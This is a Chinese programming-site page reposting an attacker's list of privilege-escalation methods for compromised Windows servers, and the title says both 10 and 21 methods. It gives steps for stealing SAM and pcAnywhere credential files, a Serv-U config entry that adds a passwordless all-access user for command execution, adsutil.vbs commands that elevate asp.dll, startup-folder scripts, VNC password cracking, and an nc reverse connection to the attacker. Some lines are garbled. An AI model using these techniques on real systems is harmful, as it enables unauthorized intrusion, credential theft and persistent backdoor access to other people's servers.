程序師世界是廣大編程愛好者互助、分享、學習的平台,程序師世界有你更精彩!
首頁
編程語言
C語言|JAVA編程
Python編程
網頁編程
ASP編程|PHP編程
JSP編程
數據庫知識
MYSQL數據庫|SqlServer數據庫
Oracle數據庫|DB2數據庫
 程式師世界 >> 編程語言 >> .NET網頁編程 >> .NET實例教程 >> 10種提升權限的方法

10種提升權限的方法

編輯:.NET實例教程
21種提升權限的方法

以下全部是本人提權時候的總結,很多方法至今沒有機會試驗也沒有成功,但是我是的確看見別人成功過的。本人不才,除了第一種方法自己研究的,其他的都是別人的經驗總結。希望對朋友有幫助!

1.radmin連接法
 
條件是你權限夠大,對方連防火牆也沒有。封裝個radmin上去,運行,開對方端口,然後radmin上去。本人從來沒成功過,端口到是給對方打開了。

2.paanywhere J?)Y[KBa 

C:\Documents and Settings\All Users\Application Data\Symantec\pcAnywhere\ 這裡下他的GIF文件,在本地安裝pcanywhere上去。
 
3.SAM破解 

C:\WINNT\system32\config\ 下他的SAM 破解之。
 
4.SU密碼奪取 

C:\Documents and Settings\All Users\「開始」菜單\程序\引用:Serv-U,然後本地查看屬性,知道路徑後,看能否跳轉。進去後,如果有權限修改ServUDaemon.ini,加個用戶上去,密碼為空。
 

[USER=WekweN|1]
PassWord=
HomeDir=c:\ 
TimeOut=600
Maintenance=System 
Access1=C:\|RWAMELCDP  
Access1=d:\|RWAMELCDP 
Access1=f:\|RWAMELCDP 
SKEYValues= yZfxv%N38/ 


這個用戶具有最高權限,然後我們就可以FTP上去 quote site exec xxx 來提升權限。
 
5.c:\winnt\system32\inetsrv\data\ tG(gOU1 e/ 

引用:就是這個目錄,同樣是erveryone 完全控制,我們所要做的就是把提升權限的工具上傳上去,然後執行。

6.SU溢出提權

這個網上教程N多,不詳細講解了。 
 
7.運行Csript

引用:運行"cscript C:\Inetpub\AdminScripts\adsutil.vbs get w3svc/inprocessisapiaPPS"來提升權限。
 
用這個cscript C:\Inetpub\AdminScripts\adsutil.vbs get w3svc/inprocessisapiapps ,查看有特權的dll文件:idq.dll httpext.dll httpodbc.dll ssinc.dll msw3prt.dll,再將asp.dll加入特權一族。asp.dll是放在c:\winnt\system32\inetsrv\asp.dll (不同的機子放的位置不一定一樣),我們現在加進去cscript adsutil.vbs set /W3SVC/InProcessIsapiAPPS "C:\WINNT\system32\idq.dll" "C:\WINNT\system32\inetsrv\httpext.dll" "C:\WINNT\system32\inetsrv\httpodbc.dll" "C:\WINNT\system32\inetsrv\ssinc.dll" "C:\WINNT\system32\msw3prt.dll""c:\winnt\system32\inetsrv\ASP.dll" 。可以用cscript adsutil.vbs get /W3SVC/InProcessIsapiAPPS 來查看是不是加進去了。
 
8.腳本提權
 
c:\Documents and Settings\All Users\「開始」菜單\程序\啟動"寫入bat,vbs。 
 
9.

默認情況下VNC密碼存放在HKCU\Software\ORL\WinVNC3\PassWord,我們可以用vncx4破解它。vncx4使用很簡單,只要在命令行下輸入: 
 
c:\>vncx4 -W 

然後順序輸入上面的每一個十六進制數據,沒輸完一個回車一次就行了。
10.NC提權
 
給對方來個NC,但是條件是你要有足夠的運行權限,然後把它反彈到自己的電腦上。

  1. 上一頁:
  2. 下一頁:
Copyright © 程式師世界 All Rights Reserved